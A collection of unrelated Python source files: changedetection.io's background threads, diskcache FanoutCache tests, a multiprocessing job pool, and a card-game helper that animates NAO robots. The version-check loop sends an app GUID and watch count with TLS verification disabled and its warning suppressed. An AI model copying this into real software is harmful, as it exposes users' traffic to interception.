urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
global notification_debug_log
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], str(e)))
# UUID won't be present when we submit a 'test' from the global settings
if 'uuid' in n_object:
datastore.update_watch(uuid=n_object['uuid'],
update_obj={'last_notification_error': "Notification error detected, please see logs."})
log_lines = str(e).splitlines()
notification_debug_log += log_lines
# Trim the log length
notification_debug_log = notification_debug_log[-100:]
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers that do the fetching
# Can be overridden by ENV or use the default settings
n_workers = int(os.getenv("FETCH_WORKERS", datastore.data['settings']['requests']['workers']))
for _ in range(n_workers):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data in case it changes while we're iterating through it all
while True:
try:
copied_datastore = deepcopy(datastore)
except RuntimeError as e:
# RuntimeError: dictionary changed size during iteration
time.sleep(0.1)
else:
break
# Re #438 - Don't place more watches in the queue to be checked if the queue is already large
while update_q.qsize() >= 2000:
time.sleep(1)
# Check for watches outside of the time threshold to put in the thread queue.
now = time.time()
max_system_wide = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
for uuid, watch in copied_datastore.data['watching'].items():
# No need to do further processing if it's paused
if watch['paused']:
continue
# If they supplied an individual entry minutes to threshold.
watch_minutes_between_check = watch.get('minutes_between_check', None)
if watch_minutes_between_check is not None:
# Cast to int just in case
max_time = int(watch_minutes_between_check) * 60
else:
# Default system wide.
max_time = max_system_wide
threshold = now - max_time
# Yeah, put it in the queue, it's more than time
if watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
test_fanout.py
|
"Test diskcache.fanout.FanoutCache."
import collections as co
import hashlib
import io
import os
import os.path as op
import pickle
import shutil
import subprocess as sp
import tempfile
import threading
import time
import warnings
from unittest import mock
import pytest
import diskcache as dc
warnings.simplefilter('error')
warnings.simplefilter('ignore', category=dc.EmptyDirWarning)
@pytest.fixture
def cache():
with dc.FanoutCache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
default_settings = dc.DEFAULT_SETTINGS.copy()
del default_settings['size_limit']
for key, value in default_settings.items():
assert getattr(cache, key) == value
assert cache.size_limit == 2 ** 27
cache.check()
for key, value in dc.DEFAULT_SETTINGS.items():
setattr(cache, key, value)
cache.check()
def test_set_get_delete(cache):
for value in range(100):
cache.set(value, value)
cache.check()
for value in range(100):
assert cache.get(value) == value
cache.check()
for value in range(100):
assert value in cache
cache.check()
for value in range(100):
assert cache.delete(value)
assert cache.delete(100) is False
cache.check()
for value in range(100):
cache[value] = value
cache.check()
for value in range(100):
assert cache[value] == value
cache.check()
cache.clear()
assert len(cache) == 0
cache.check()
def test_set_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
set_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.set = set_func
set_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.set(0, 0)
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_touch_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
touch_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.touch = touch_func
touch_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.touch(0)
def test_add(cache):
assert cache.add(0, 0)
assert not cache.add(0, 1)
assert cache.get(0) == 0
def test_add_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
add_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.add = add_func
add_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.add(0, 0)
def stress_add(cache, limit, results):
total = 0
for num in range(limit):
if cache.add(num, num, retry=True):
total += 1
# Stop one thread from running ahead of others.
time.sleep(0.001)
results.append(total)
def test_add_concurrent():
with dc.FanoutCache(shards=1) as cache:
results = co.deque()
limit = 1000
threads = [
threading.Thread(target=stress_add, args=(cache, limit, results))
for _ in range(16)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sum(results) == limit
cache.check()
shutil.rmtree(cache.directory, ignore_errors=True)
def test_incr(cache):
assert cache.incr('key', delta=3) == 3
def test_incr_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
incr_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.incr = incr_func
incr_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.incr('key', 1) is None
def test_decr(cache):
assert cache.decr('key', delta=2) == -2
def test_decr_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
decr_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.decr = decr_func
decr_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.decr('key', 1) is None
def stress_incr(cache, limit):
for _ in range(limit):
cache.incr(b'key', retry=True)
time.sleep(0.001)
def test_incr_concurrent():
with dc.FanoutCache(shards=1, timeout=0.001) as cache:
count = 16
limit = 50
threads = [
threading.Thread(target=stress_incr, args=(cache, limit))
for _ in range(count)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert cache.get(b'key') == count * limit
cache.check()
shutil.rmtree(cache.directory, ignore_errors=True)
def test_getsetdel(cache):
values = [
(None, False),
((None,) * 2 ** 10, False),
(1234, False),
(2 ** 512, False),
(56.78, False),
(u'hello', False),
(u'hello' * 2 ** 10, False),
(b'world', False),
(b'world' * 2 ** 10, False),
(io.BytesIO(b'world' * 2 ** 10), True),
]
for key, (value, file_like) in enumerate(values):
assert cache.set(key, value, read=file_like)
assert len(cache) == len(values)
for key, (value, file_like) in enumerate(values):
if file_like:
assert cache[key] == value.getvalue()
else:
assert cache[key] == value
for key, _ in enumerate(values):
del cache[key]
assert len(cache) == 0
for value, (key, _) in enumerate(values):
cache[key] = value
assert len(cache) == len(values)
for value, (key, _) in enumerate(values):
assert cache[key] == value
for _, (key, _) in enumerate(values):
del cache[key]
assert len(cache) == 0
cache.check()
def test_get_timeout(cache):
cache.set(0, 0)
shards = mock.Mock()
shard = mock.Mock()
get_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.get = get_func
get_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.get(0) is None
def test_pop(cache):
for num in range(100):
cache[num] = num
for num in range(100):
assert cache.pop(num) == num
def test_pop_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
pop_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.pop = pop_func
pop_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert cache.pop(0) is None
def test_delete_timeout(cache):
shards = mock.Mock()
shard = mock.Mock()
delete_func = mock.Mock()
shards.__getitem__ = mock.Mock(side_effect=lambda key: shard)
shard.delete = delete_func
delete_func.side_effect = dc.Timeout
with mock.patch.object(cache, '_shards', shards):
assert not cache.delete(0)
def test_delitem(cache):
cache[0] = 0
assert cache[0] == 0
del cache[0]
def test_delitem_keyerror(cache):
with pytest.raises(KeyError):
del cache[0]
def test_tag_index(cache):
assert cache.tag_index == 0
cache.create_tag_index()
assert cache.tag_index == 1
cache.drop_tag_index()
assert cache.tag_index == 0
def test_read(cache):
cache.set(0, b'abcd' * 2 ** 20)
with cache.read(0) as reader:
assert reader is not None
def test_read_keyerror(cache):
with pytest.raises(KeyError):
with cache.read(0):
pass
def test_getitem_keyerror(cache):
with pytest.raises(KeyError):
cache[0]
def test_expire(cache):
cache.reset('cull_limit', 0)
for value in range(100):
cache.set(value, value, expire=1e-9)
assert len(cache) == 100
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.expire() == 100
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_size_limit_with_files(cache):
shards = 8
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40 * shards):
cache.set(key, value)
assert (cache.volume() // shards) > size_limit
cache.cull()
assert (cache.volume() // shards) <= size_limit
def test_size_limit_with_database(cache):
shards = 8
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value)) * shards
for key in range(count):
cache.set(key, value)
assert (cache.volume() // shards) > size_limit
cache.cull()
assert (cache.volume() // shards) <= size_limit
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_remove_timeout(cache):
shard = mock.Mock()
clear = mock.Mock()
shard.clear = clear
clear.side_effect = [dc.Timeout(2), 3]
with mock.patch.object(cache, '_shards', [shard]):
assert cache.clear() == 5
def test_reset_timeout(cache):
shard = mock.Mock()
reset = mock.Mock()
shard.reset = reset
reset.side_effect = [dc.Timeout, 0]
with mock.patch.object(cache, '_shards', [shard]):
assert cache.reset('blah', 1) == 0
def test_stats(cache):
for value in range(100):
cache[value] = value
assert cache.stats(enable=True) == (0, 0)
for value in range(100):
cache[value]
for value in range(100, 110):
cache.get(value)
assert cache.stats(reset=True) == (100, 10)
assert cache.stats(enable=False) == (0, 0)
for value in range(100):
cache[value]
for value in range(100, 110):
cache.get(value)
assert cache.stats() == (0, 0)
assert len(cache.check()) == 0
def test_volume(cache):
volume = sum(shard.volume() for shard in cache._shards)
assert volume == cache.volume()
def test_iter(cache):
for num in range(100):
cache[num] = num
assert set(cache) == set(range(100))
def test_iter_expire(cache):
"""Test iteration with expiration.
Iteration does not expire keys.
"""
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
time.sleep(0.1)
assert set(cache) == set(range(100))
cache.expire()
assert set(cache) == set()
def test_reversed(cache):
for num in range(100):
cache[num] = num
reverse = list(reversed(cache))
assert list(cache) == list(reversed(reverse))
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize(name='fib')
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == hits1 + count
assert misses2 == misses1
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def run(command):
print('run$ %r' % command)
try:
result = sp.check_output(command, stderr=sp.STDOUT)
print(result)
except sp.CalledProcessError as exc:
print(exc.output)
raise
def test_rsync():
try:
run(['rsync', '--version'])
except OSError:
return # No rsync installed. Skip test.
rsync_args = ['rsync', '-a', '--checksum', '--delete', '--stats']
cache_dir1 = tempfile.mkdtemp() + os.sep
cache_dir2 = tempfile.mkdtemp() + os.sep
# Store some items in cache_dir1.
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(100):
cache1[count] = str(count)
for count in range(100, 200):
cache1[count] = str(count) * int(1e5)
# Rsync cache_dir1 to cache_dir2.
run(rsync_args + [cache_dir1, cache_dir2])
# Validate items in cache_dir2.
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(100):
assert cache2[count] == str(count)
for count in range(100, 200):
assert cache2[count] == str(count) * int(1e5)
# Store more items in cache_dir2.
with dc.FanoutCache(cache_dir2) as cache2:
for count in range(200, 300):
cache2[count] = str(count)
for count in range(300, 400):
cache2[count] = str(count) * int(1e5)
# Rsync cache_dir2 to cache_dir1.
run(rsync_args + [cache_dir2, cache_dir1])
# Validate items in cache_dir1.
with dc.FanoutCache(cache_dir1) as cache1:
for count in range(100):
assert cache1[count] == str(count)
for count in range(100, 200):
assert cache1[count] == str(count) * int(1e5)
for count in range(200, 300):
assert cache1[count] == str(count)
for count in range(300, 400):
assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
class SHA256FilenameDisk(dc.Disk):
def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(self._directory, filename)
return filename, full_path
def test_custom_filename_disk():
with dc.FanoutCache(disk=SHA256FilenameDisk) as cache:
for count in range(100, 200):
key = str(count).encode('ascii')
cache[key] = str(count) * int(1e5)
disk = SHA256FilenameDisk(cache.directory)
for count in range(100, 200):
key = str(count).encode('ascii')
subdir = '%03d' % (disk.hash(key) % 8)
filename = hashlib.sha256(key).hexdigest()[:32]
full_path = op.join(cache.directory, subdir, filename)
with open(full_path) as reader:
content = reader.read()
assert content == str(count) * int(1e5)
shutil.rmtree(cache.directory, ignore_errors=True)
|
processpool.py
|
import multiprocessing
import pickle
import queue
import sys
import time
from concurrent.futures import Future
from threading import Thread
from typing import Any
from tblib import pickling_support
SLEEP_TICK = 0.001 # Duration in seconds used to sleep when waiting for results
class WorkerDiedException(Exception):
"""Raised when getting the result of a job where the process died while executing it for any reason."""
def __init__(self, message, code=None):
self.code = code
self.message = message
def __reduce__(self):
return (WorkerDiedException, (self.message, self.code))
class JobFailedException(Exception):
"""Raised when a job fails with a normal exception."""
def __init__(self, message, original_exception_type=None):
self.original_exception_type = original_exception_type
self.message = message
super().__init__(message)
def __str__(self):
return f"{self.__class__.__name__}: {self.original_exception_type}({self.message})"
def __reduce__(self):
return (JobFailedException, (self.message, self.original_exception_type))
class ProcessPoolShutDownException(Exception):
"""Raised when submitting jobs to a process pool that has been .join()ed or .terminate()d"""
pass
@pickling_support.install
class _WrappedWorkerException(Exception): # we need this since tracebacks aren't pickled by default and therefore lost
def __init__(self, exception_str, exception_cls=None, traceback=None):
# don't pickle problematic exception classes
self.exception = JobFailedException(exception_str, exception_cls)
if traceback is None:
__, __, self.traceback = sys.exc_info()
else:
self.traceback = traceback
class _WorkerHandler:
def __init__(self, worker_class: type): # Runs in the main process
self.worker_class = worker_class
self.busy_with_future = None
self.send_q = multiprocessing.Queue() # type: multiprocessing.Queue
self.recv_q = multiprocessing.Queue() # type: multiprocessing.Queue
self.process = multiprocessing.Process(
target=self._worker_job_loop, args=(self.worker_class, self.recv_q, self.send_q)
)
self.process.start()
def send(self, job):
args, kwargs, future = job
self.busy_with_future = future
try:
self.send_q.put(pickle.dumps((args, kwargs)))
except Exception as error: # pickle errors
self.recv_q.put(pickle.dumps((None, _WrappedWorkerException(str(error), error.__class__.__name__))))
def result(self):
if not self.busy_with_future:
return None
try:
ret, err = pickle.loads(self.recv_q.get(block=False))
if err:
unwrapped_err = err.exception # unwrap
unwrapped_err.__traceback__ = err.traceback
err = unwrapped_err
return ret, err
except queue.Empty:
if not self.process.is_alive():
raise WorkerDiedException(
f"{self.process.name} terminated unexpectedly with exit code {self.process.exitcode} while running job.",
self.process.exitcode,
)
return None
@staticmethod
def _worker_job_loop(
worker_class: type, recv_q: multiprocessing.Queue, send_q: multiprocessing.Queue
): # Runs in a subprocess
worker = worker_class()
while True:
args, kwargs = pickle.loads(send_q.get(block=True))
try:
result = worker.run(*args, **kwargs)
error = None
except MemoryError: # py 3.8 consistent error
raise WorkerDiedException(f"Process encountered MemoryError while running job.", "MemoryError")
except Exception as e:
error = _WrappedWorkerException(str(e), e.__class__.__name__)
result = None
try:
recv_q.put(pickle.dumps((result, error)))
except Exception as e:
error = _WrappedWorkerException(str(e), e.__class__.__name__)
recv_q.put(pickle.dumps((None, error)))
class ProcessPool:
def __init__(self, worker_class: type, pool_size: int = 1):
"""Manages dispatching jobs to processes, checking results, sending them to futures and restarting if they die.
Args:
worker_class (Class): type that will receive the jobs in its `run` method; one instance will be created per process and should initialize itself fully.
pool_size (int): number of worker processes to use.
"""
self.worker_class = worker_class
self.pool_size = pool_size
self.shutting_down = False
self.terminated = False
self._pool = [self._create_new_worker() for _ in range(pool_size)]
self._job_queue = queue.Queue() # type: queue.Queue # no need for a MP queue here
self._job_loop = Thread(target=self._job_manager_thread, daemon=True)
self._job_loop.start()
def _create_new_worker(self):
return _WorkerHandler(self.worker_class)
def join(self):
"""Waits for jobs to finish and shuts down the pool."""
self.shutting_down = True
if self.terminated:
raise ProcessPoolShutDownException("Can not join a WorkerPool that has been terminated")
while not self._job_queue.empty() or any(worker.busy_with_future for worker in self._pool):
time.sleep(SLEEP_TICK)
self.terminate() # could be gentler on the children
def terminate(self):
"""Kills all sub-processes and stops the pool immediately."""
self.terminated = True
for worker in self._pool:
worker.process.terminate()
self._job_queue.put(None) # in case it's blocking
def _job_manager_thread(self):
"""Manages dispatching jobs to processes, checking results, sending them to futures and restarting if they die"""
while True:
busy_procs = []
idle_procs = []
for wix, worker in enumerate(self._pool):
if worker.busy_with_future:
try:
result = worker.result()
if result is None:
busy_procs.append(wix)
continue
else:
result, exc = result
except WorkerDiedException as e:
if not self.terminated:
self._pool[wix] = self._create_new_worker() # restart worker
result, exc = None, e
if exc:
worker.busy_with_future.set_exception(exc)
else:
worker.busy_with_future.set_result(result) # Could be None
worker.busy_with_future = None # done!
else:
idle_procs.append(wix)
if not idle_procs:
time.sleep(SLEEP_TICK)
continue
if busy_procs:
try:
job = self._job_queue.get(block=False)
except queue.Empty:
time.sleep(SLEEP_TICK)
continue
else: # no jobs are running, so we can block
job = self._job_queue.get(block=True)
if job is None:
return
self._pool[idle_procs[0]].send(job)
def submit_job(self, *args, **kwargs) -> Future:
"""Submits job asynchronously, which will eventually call the `run` method in worker_class with the arguments given, all of which should be picklable."""
if self.terminated or self.shutting_down:
raise ProcessPoolShutDownException("Worker pool shutting down or terminated, can not submit new jobs")
future = Future() # type: Future
self._job_queue.put((args, kwargs, future))
return future
def run_job(self, *args, **kwargs) -> Any:
"""Submits job and blocks to wait for result. Returns the result or raises any Exception encountered. Should typically only be called from a thread."""
return self.submit_job(*args, **kwargs).result()
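# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of the ProcessPool API defined above, assuming only the public
# surface shown here (a worker class exposing `run`, plus submit_job/run_job/join);
# the `SquareWorker` name is hypothetical.
if __name__ == "__main__":
    class SquareWorker:
        def run(self, x):
            return x * x
    pool = ProcessPool(SquareWorker, pool_size=2)
    futures = [pool.submit_job(i) for i in range(4)]  # asynchronous submission
    print([f.result() for f in futures])              # -> [0, 1, 4, 9]
    print(pool.run_job(5))                            # blocking helper -> 25
    pool.join()                                       # wait for pending jobs, then shut down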
|
Helper.py
|
#!/usr/bin/python
from pygame.sprite import DirtySprite
import random
import time
import logging
from pygame.surface import Surface
from src.Properties import Color, Size
from tts_client import invoke_tts
from utils import *
RATE_PERCENTAGE_MAX = 25
RATE_PERCENTAGE_MIN = -25
# RANGE_PERCENTAGE_MAX = 50 # RG
# RANGE_PERCENTAGE_MIN = -50 # RG
ENERGY_PERCENTAGE_MAX = 5 # RG
ENERGY_PERCENTAGE_MIN = -5 # RG
FOMEAN_PERCENTAGE_MAX = 10 # RG
FOMEAN_PERCENTAGE_MIN = -10 # RG
#mpatacchiola: include for the robot libraries
import threading
import sys
sys.path.insert(1, "./pynaoqi-python2.7-2.1.3.3-linux64") #import this module for the nao.py module
from naoqi import ALProxy
import random #randint to generate random advice
import csv #to read the configuration file with the robot IP and PORT
#mpatacchiola: move the head
def robot_move_head(direction, sleep, avatar_name, csv_path='./robot.csv'):
"""
Move the head of the robot
    It moves the head of the robot toward the screen or the participant.
Before talking it looks to the participant. At the end it looks back to the screen.
It requires the robot.csv file which must contain where the participant is placed.
@param direction string identifying where to look ('screen' or 'participant')
    @param sleep how many seconds to sleep before the movement
@param avatar_name the name of the avatar to move
@param csv_path the path of the CSV file
"""
avatar_found = False
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
conf_avatar_name = row[0]
conf_nao_ip = row[1]
conf_nao_port = row[2]
conf_nao_movement = row[3]
conf_participant_position = row[4]
if(conf_avatar_name == avatar_name):
avatar_found = True
NAO_IP = conf_nao_ip
NAO_PORT = conf_nao_port
NAO_MOVE = conf_nao_movement
break
if(avatar_found == False):
print("ROBOT ERROR: avatar '" + str(avatar_name) + "' not found!")
return 0
try:
al_motion_proxy = ALProxy("ALMotion", NAO_IP, int(NAO_PORT))
except Exception, e:
print "ROBOT ERROR: Error creating the ALMotion proxy!"
print str(e)
#self._al_motion_proxy.setAngles("HeadPitch", angle, HEAD_SPEED)
time.sleep(sleep)
head_speed = 0.3 # change the speed if needed
if(conf_participant_position == "left" and direction=="screen"):
angle = +1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "left" and direction=="participant"):
angle = -1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "right" and direction=="screen"):
angle = +1.0 # 60 degrees = 1.0 radians
elif(conf_participant_position == "right" and direction=="participant"):
angle = -1.0 # 60 degrees = 1.0 radians
else:
print "ROBOT ERROR: Error the combination does not exist participant_position=" + str(conf_participant_position) + "; direction=" + str(direction)
# Move the head in the direction
if NAO_MOVE == "True" or NAO_MOVE == "true" or NAO_MOVE == "TRUE":
al_motion_proxy.setAngles("HeadYaw", angle, head_speed)
#mpatacchiola: creating the motion object
def robot_animation(advice, avatar_name, csv_path='./robot.csv', verbose=True):
"""Given the name of the avatar and an advice it animates one of the robots.
The gestures are sampled among the NAO animations.
The function will look for a file called 'robot.csv' containing:
comma separated values for [Avatar name, IP address, PORT number, MOVE True/False].
The file must be in the root folder.
@param advice the advice string
@param avatar_name the name of the avatar (Veronika, Monika, Tereza)
@param csv_path the path where the CSV file is located (default is root)
@param verbose if True it prints the steps on terminal
"""
avatar_found = False
with open(csv_path, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
conf_avatar_name = row[0]
conf_nao_ip = row[1]
conf_nao_port = row[2]
conf_nao_movement = row[3]
if(conf_avatar_name == avatar_name):
avatar_found = True
NAO_IP = conf_nao_ip
NAO_PORT = conf_nao_port
NAO_MOVE = conf_nao_movement
break
if(avatar_found == False):
if verbose: print("ROBOT ERROR: AVATAR '" + str(avatar_name) + "' NOT FOUND!")
return 0
if verbose: print "ROBOT init..."
if verbose: print("ROBOT IP: " + str(NAO_IP))
if verbose: print("ROBOT PORT: " + str(NAO_PORT))
if verbose: print("ROBOT MOVE: " + str(NAO_MOVE))
if verbose: print("ROBOT avatar: " + str(avatar_name))
if verbose: print("ROBOT advice: " + str(advice))
# If the movements are enabled it moves during the speech
if NAO_MOVE == "True" or NAO_MOVE == "true" or NAO_MOVE == "TRUE":
animated_speech_proxy = ALProxy("ALAnimatedSpeech", NAO_IP, int(NAO_PORT))
#set the local configuration
configuration = {"bodyLanguageMode":"contextual"}
#say the text with the local configuration
gesture_list = list()
gesture_list.append("^start(animations/Stand/Gestures/Choice_1) ")
gesture_list.append("^start(animations/Stand/Gestures/Choice_2) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_1) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_2) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_4) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_6) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_7) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_8) ")
gesture_list.append("^start(animations/Stand/Gestures/Explain_9) ")
sampled_gesture = gesture_list[random.randint(0,len(gesture_list)-1)]
full_string = sampled_gesture + advice #the gesture plus the advice
animated_speech_proxy.say(full_string, configuration)
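# Illustrative robot.csv row (an assumption, not shipped with the code): the two
# functions above expect comma separated fields like
#   Veronika,192.168.1.10,9559,True,left
# i.e. [avatar name, NAO IP, NAO port, move True/False, participant position];
# robot_animation() reads the first four fields, robot_move_head() also reads the fifth.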
class HelperUnknownSignal(Surface):
def __init__(self, names=''):
super(HelperUnknownSignal, self).__init__(Size.HELPER_UNKNOWN_SIGNAL, pygame.SRCALPHA)
self.fill(color=Color.DIRECTION)
center_x, center_y = self.get_rect().center
mytext = _('not-understood')
line1 = largeText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('please-repeat')
line2 = smallText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('and-remember-who1')
line3 = miniText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
mytext = _('and-remember-who2') % names
line4 = miniText.render(unicode(mytext.decode('utf8')), True, Color.WHITE)
#AG line1 = largeText.render(_('not-understood'), True, Color.WHITE)
#AG line2 = smallText.render(_('please-repeat'), True, Color.WHITE)
#AG line3 = miniText.render(_('and-remember-who1'), True, Color.WHITE)
#AG line4 = miniText.render(_('and-remember-who2') % names, True, Color.WHITE)
self.blit(line1, (center_x - (line1.get_width() / 2), 10))
self.blit(line2, (center_x - (line2.get_width() / 2), 50))
self.blit(line3, (center_x - (line3.get_width() / 2), 90))
self.blit(line4, (center_x - (line4.get_width() / 2), 120))
CHARACTERS = {0: ('Tereza',
pygame.image.load('resources/characters/eugenia.png'),
'+0%', # RG it used to say +5%
pygame.image.load('resources/characters/thumb_eugenia.png'),
'Tereza'),
1: ('Monika',
pygame.image.load('resources/characters/amanda.png'),
'-10%', # RG it used to say -20%
pygame.image.load('resources/characters/thumb_amanda.png'),
'Monika'),
2: ('Veronika',
pygame.image.load('resources/characters/veronica.png'),
'+0%', # RG it used to say +5%
pygame.image.load('resources/characters/thumb_veronica.png'),
'Veronika'),#####AG:FIX!
3: ('undetermined',
HelperUnknownSignal(),
None,
None,
'')}
advice_prefixes = [_('advice-prefix-1'),
_('advice-prefix-2'),
_('advice-prefix-3'),
_('advice-prefix-4'),
_('advice-prefix-5'),
_('advice-prefix-6'),
_('advice-prefix-7'),
_('advice-prefix-8'),
_('advice-prefix-9'),
_('advice-prefix-10')]
advices_suffixes = {1: _('advice-suffix-1'),
2: _('advice-suffix-2'),
3: _('advice-suffix-3'),
4: _('advice-suffix-4'),
5: _('advice-suffix-5'),
6: _('advice-suffix-6'),
7: _('advice-suffix-7'),
8: _('advice-suffix-8'),
9: _('advice-suffix-9'),
10: _('advice-suffix-10'),
11: _('advice-suffix-11'),
12: _('advice-suffix-12'),
13: _('advice-suffix-13')}
class Helper(DirtySprite):
def __init__(self, id, game, initial_score=0):
self.game = game
super(Helper, self).__init__()
self.last_advice = 0
self.score = initial_score
self.rate = 0
# self.pitch_range = 0 # RG
self.energy = 0 # RG
self.f0mean = 0 # RG
self.id = id
self.name, self.image, self.pitch, self.thumb, self.nombre = CHARACTERS[id]
logging.info('Helper=> [%(name)s] initial score: [%(score)i]',
{'name': self.name, 'score': self.score})
self.rect = self.image.get_rect()
self.hide()
# def set_configuration(self, config):
# self.conf = config
def get_possible_advices(self):
advs = {}
possibles = list(set(values_of(self.game.human_player.hand)))
for val in possibles:
if val not in values_of(self.game.comp_player.hand):
key = -15
else:
a = cant_of_same_rank(self.game.human_player.hand, val)
b = cant_of_same_rank(self.game.comp_player.hand, val)
if a + b == 4:
key = 5
else:
key = b
            # If the key is not yet in the dict, create it
if key in advs:
advs[key].append(val)
else:
advs[key] = [val]
return advs
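    # Illustrative example (assumption): if the human hand holds two 7s and one 3 and
    # the computer holds one 7 and no 3s, this returns {1: [7], -15: [3]} -- each key is
    # the score delta for advising that rank, each value the list of candidate ranks.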
def get_an_advice(self):
advices = self.get_possible_advices()
# candidates = list(set(self.game.human_player.hand))
s = self.choose_better_advs(advices.keys())
candidates = advices[s]
self.score += s
logging.info('Helper=> [%(name)s] updated score to: [%(score)i]',
{'name': self.name, 'score': self.score})
# if not candidates:
# candidates = values_of(self.game.human_player.hand) # if no intersection between those two, random guess
return random.choice(candidates)
def speech_advice(self):
        #mpatacchiola: (sharedscreen) allows the movement of the robot head (it looks at the participant)
direction = "participant"
sleep = 0.0
t = threading.Thread(target=robot_move_head, args=(direction, sleep, self.name,))
t.start()
